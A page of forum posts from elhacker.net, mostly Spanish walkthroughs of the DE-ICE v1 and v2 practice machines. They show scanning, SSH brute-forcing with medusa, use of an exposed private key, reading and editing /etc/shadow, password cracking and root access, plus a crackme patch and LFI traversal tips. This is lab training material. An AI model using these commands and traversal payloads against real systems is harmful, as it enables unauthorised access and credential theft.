elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7
21  Seguridad Informática / Bugs y Exploits / Re: [Relato] Entorno controlado de seguridad DE-Ice v2 en: 6 Febrero 2012, 14:57 pm
Cita de: pianista en  4 Febrero 2012, 18:54 pm
Una curiosidad sobretodo porque en intrusiones y tal no estoy muy avezado, pero como modificas haciendo:

sudo vi /etc/shadow

Si no eres root y no tienes la contraseña de root?

Saludos

Pirrip pertenece a wheel

Saludos!
22  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net v2.0 en: 4 Febrero 2012, 10:43 am
Challenge Accepted.

EDITO: estuve a punto, después lo revisaré mejor

Una me deniega permisos y otra me deslogea. Por suerte tengo más con que jugar

Gracias por el reto.  >:D

¿Porqué tanto spam?

Saludos
23  Seguridad Informática / Bugs y Exploits / Re: [Relato] Entorno controlado de seguridad DE-Ice v2 en: 4 Febrero 2012, 10:41 am
Cabe aclarar que respondo dudas sobre el tema, pero no via MP.

Saludos
24  Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v1 en: 2 Febrero 2012, 23:21 pm
Esta vez vengo con DE-Ice v1.0.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?

-Dos máquinas virtuales
-De-ICE v1
-Backtrack 5
-Diccionario de claves comunes inglesas

¿Cuáles serán nuestros objetivos?
-Mapeo de red
-Análisis de red
-Fuerza bruta a servicio
-Fuerza bruta a shadow
-Root

¿Reglas?
-No Exploit

Allá que vamos

Escaneamos las redes para localizar a nuestra presa.

Citar
netdiscover

Currently scanning: 192.168.1.0/16   |   Screen View: ARP Reply                                                                                                       
                                                                                                                                                                       
 1 Captured ARP Reply packets, from 1 hosts.   Total size: 60                                                                                                         
 _____________________________________________________________________________                                                                                         
   IP            At MAC Address      Count  Len   MAC Vendor                                                                                                           
 -----------------------------------------------------------------------------
 192.168.1.100   08:00:27:b1:50:12    01    060   CADMUS COMPUTER SYSTEMS
           

Identificamos servicvios con NMAP:

Citar
root@bt:/# nmap -sV 192.168.1.100

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds

Dejando huella

Vemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4.
Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos.

Esto fue lo que obtuve:
Citar
addams
aadams
adaams
damsaa
adamsa
banterb
bbanter
banterb
anterbb
bbanteerbb
coffeec
cooffec
ccoffee
coooffe
cooofef
coofefc
cooffee

Lanzamos medusa tratando de tener suerte.
Citar
medusa -h 192.168.1.100 -U user -P user -M ssh

¡Bingo! Nos encuentra un usuario. Mismo usuario y clave.

Citar
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)

Decepción

Accedo vía SSH:
Citar
root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:

Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es:

Citar
exit


Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos.

Pidiendo auxilio a la medusa

Intentemos con otro diccionario:

Citar
medusa -h 192.168.1.100 -U user -P list.lst -M ssh

Citar
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)

Nos muestra el usuario aadams, con su consiguiente clave.

Entramos via SSH, y obtenemos el fichero.

Root Success

Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
aadams@slax:~$

Salimos.
Citar
exit

Crackeamos.
Citar
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow

El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave.

Resultado final:
Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root
root@slax:/home/aadams#

Hasta la próxima.

Dedicación: Oversec, CPH, H-Sec, EH

Saludos
25  Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v2 en: 2 Febrero 2012, 20:49 pm
Trasteando aburrido, descargué dos sistemas de seguridad controlados para practicar un Test de Intrusión. Estas son DE-ICE v1 y V2 respectivamente.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?

-Dos máquinas virtuales
-De-ICE v2
-Backtrack 5

¿Cuáles serán nuestros objetivos?
-Webcrawling
-acceder servidor
-Obtener privilegios de ROOT

¿Reglas?
-No Exploit

Empieza la fiesta.

Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*.

Esto se puede realizar con el siguiente comando:
Código:
ifconfig eth0 192.168.2.150
Siendo 150 una dirección libre, y eth0 su interfaz de red.

Procedamos pues a localizar el servidor.
haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*.

Veamos que tenemos por aquí.
Citar
Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados.
Citar
nmap -sV 192.168.2.100 - nmap -sV 192.168.2.101
-Primer host:
Citar
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios.

Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente".

Buscando amigos

Seleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés.

Ésta es mi lista:
Citar
root
admin
~root
~admin
~pickwick
~winkle
~snodgrass
~tupman
~weller
~tweller
~havisham
~magwitch
~pirrip
~nickleby
~rnickleby
~noggs
~squeers
~pinch
~tapley
~gamp
~marley
~scrooge
~cratchit
~sikes
~dawkins
~claypole
Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh.

http://192.168.2.101/~pirrip/.ssh

Ahí tenemos los id_rsa y id_rsa.pub, esperándonos

Lo almacenamos en /root/.ssh/ y damos permisos 777.

Intruder Here

Procedamos a conectar via SSH.
Citar
ssh pirrip@192.168.2.100
Tachán! estamos dentro.

You Have New Mail

Entramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo.
En el vemos:
Citar
root@bt:~# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$ mailx
mailx version nail 11.25 7/29/05. Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella
N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team
N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham
N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month
N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation
N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation
N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder
? 7
Leemos el correo:
Citar
From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.

Regards,
Fermion Support


E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Tenemos una clave suculenta...

Root Me, Please!

Hagamos uso de una vieja técnica.
Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios.

Citar
sudo vi /etc/shadow
Ahí ingresaremos la clave que nos facilitó nuestro amigo via mail
Antes:
Citar
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Después:
Citar
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st.

Citar
pirrip@slax:~$ su
Password: ***********
root@slax:/home/pirrip# whoami
root
root@slax:/home/pirrip#
GAME OVER!

Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec!

Fuente: Oversec.org (Escrito por mi)

Un saludo
26  Seguridad Informática / Nivel Web / Re: Relato de una intrusión - Un miserable LFI en: 21 Diciembre 2011, 19:03 pm
Puede que tengas algún tipo de protección, debería saltar al fichero "claves.txt%00".

Saludos.
27  Programación / Ingeniería Inversa / [Tutorial] SelfKeygen Crackme 58DD2D69 C.L.S. en: 17 Diciembre 2011, 19:31 pm
Este es un crackme que descargué de la lista de cls, 12/2011.

Descripción:
Citar
This crackme is a simple algorithm.It's written in visual c++ 6.0 with mfc.
Level 1/10

Herramientas:
-OllyDBG

Donde lo descargo
-Aquí

Puesta a punto
Arrancamos con Olly, y buscamos entre las strings:


Vamos al salto al chico bueno y vemos lo siguiente:


Vemos que tenemos 4 strings, una de longitud mínima, serial olvidado, el chico bueno y chico malo.

Nos fijamos que antes pasa por una comparación. Colocamos un BP en dicho CALL, y vemos que se trae entre manos:


Vemos que ahí tenemos el serial falso y verdadero comparándose.

Afilando los dientes

Básicamete lo que haremos, es decirle al programa que de no cumplirse, realice un JMP a una zona vacia del ejecutable, con permisos, donde obtendrá el serial verdadero y lo mostrará.

Creamos un salto a una zona vacía


En ella cargamos los valores, y posteriormente hacemos un salto al CALL.


Vemos que funciona.


Nos vemos!

Guardamos los cambios a otro ejecutable, y probamos. Primero un serial falso y después el verdadero que mostró:


Saludos

EDITO: Próximamente keygen.
28  Seguridad Informática / Nivel Web / Re: ayuda con LFI en: 14 Diciembre 2011, 19:21 pm
-
29  Seguridad Informática / Nivel Web / Re: ayuda con LFI en: 12 Diciembre 2011, 15:26 pm
No tendrás permiso de escritura

El fichero /proc/self/environ no tiene porqué estar en todos los servidores XD

¿Seguro tiene wget instalado?

¿Ruta adecuada? (Intenta provocar un FPD)

Saludos.
30  Seguridad Informática / Nivel Web / Re: Relato de una intrusión - Un miserable LFI en: 12 Diciembre 2011, 15:24 pm
Cita de: ruben_linux en 11 Diciembre 2011, 19:44 pm
  :-[
pido disculpas, leer dos veces antes de contestar.

 ;)

Me van a patear las bo.. cuentas, pero adelantado siento desviar el tema

Cuando tienes algún problema con la extensión, símplemente córtala usando el null byte, tanto en LFI como otros. Te toparás que a veces sale con un:
file=../../../../.../../../etc/passwd/0.php, en ese caso sigue intentando por otro medio.

Saludos.
Páginas: 1 2 [3] 4 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines